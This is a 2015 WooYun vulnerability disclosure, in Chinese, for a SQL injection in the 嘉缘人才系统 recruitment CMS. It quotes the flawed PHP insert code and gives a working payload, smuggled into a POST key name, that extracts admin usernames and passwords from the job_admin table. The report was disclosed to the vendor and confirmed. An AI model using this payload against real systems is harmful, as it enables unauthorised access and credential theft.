当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098170

漏洞标题:嘉缘人才系统sql注入#3

相关厂商:finereason.com

漏洞作者: 牛肉包子

提交时间:2015-03-02 12:29

修复时间:2015-06-03 13:02

公开时间:2015-06-03 13:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-08: 细节向第三方安全合作伙伴开放
2015-04-29: 细节向核心白帽子及相关领域专家公开
2015-05-09: 细节向普通白帽子公开
2015-05-19: 细节向实习白帽子公开
2015-06-03: 细节向公众公开

简要描述:

求20rank

详细说明:

首先看到frcms\member\requires_list.php

if($do=="savedata"){
if($_POST['id']==""){
$_POST['sid']=intval($Memberid);
$_POST['member']=_getcookie('user_login');
$_POST['school']=_getcookie('user_name');
if(empty($_POST['title'])){
showmsg('标题不能为空!','-1');exit;
}
$_POST['adddate']=date('Y-m-d H:i:s');
unset($_POST['submit'],$_POST['reset'],$_POST['id']);
$tks=$tvs='';
foreach($_POST as $key=>$value){
if($value==''){
continue;
}else{
$tks.="r_$key,";
$tvs.="'$value',";
}
}
$tks=substr($tks,0,-1);
//var_dump($tks);
$tvs=substr($tvs,0,-1);
$sql="insert into {$cfg['tb_pre']}require ($tks) values($tvs)";
//var_dump($sql);
$db ->query($sql);
showmsg("添加成功!","?m=requires_list&show=$show");exit;


可以看到POST的key没有进过单引号直接进入了insert语句。
首先注册一个企业会员

1.png


然后访问

http://127.0.0.1/frcms/member/?m=requires_list


然后添加招生简历

2.png


然后抓包

3.png


构造

title,r_member,r_sid,r_content,r_flag,r_school,r_adddate)values('xxxx1','papapa','3','1',char(@`'`),(select(group_concat(a_user,0x7c,a_pass))from%0a%0ajob_admin),now())#=1&title=sssss&content=sssssssssss&id=&submit=%CC%ED+%BC%D3


因为key直接进入了sql中。然后发包。可以看到mysql的日志文件

4.png


语句已经执行了。然后查看招生简历

5.png


可以看到账户密码已经出来了。

漏洞证明:

5.png

修复方案:

转义

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-05 13:00

厂商回复:

修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-02 12:50 | roker ( 普通白帽子 | Rank:357 漏洞数:102 )

    爷爷好恐怖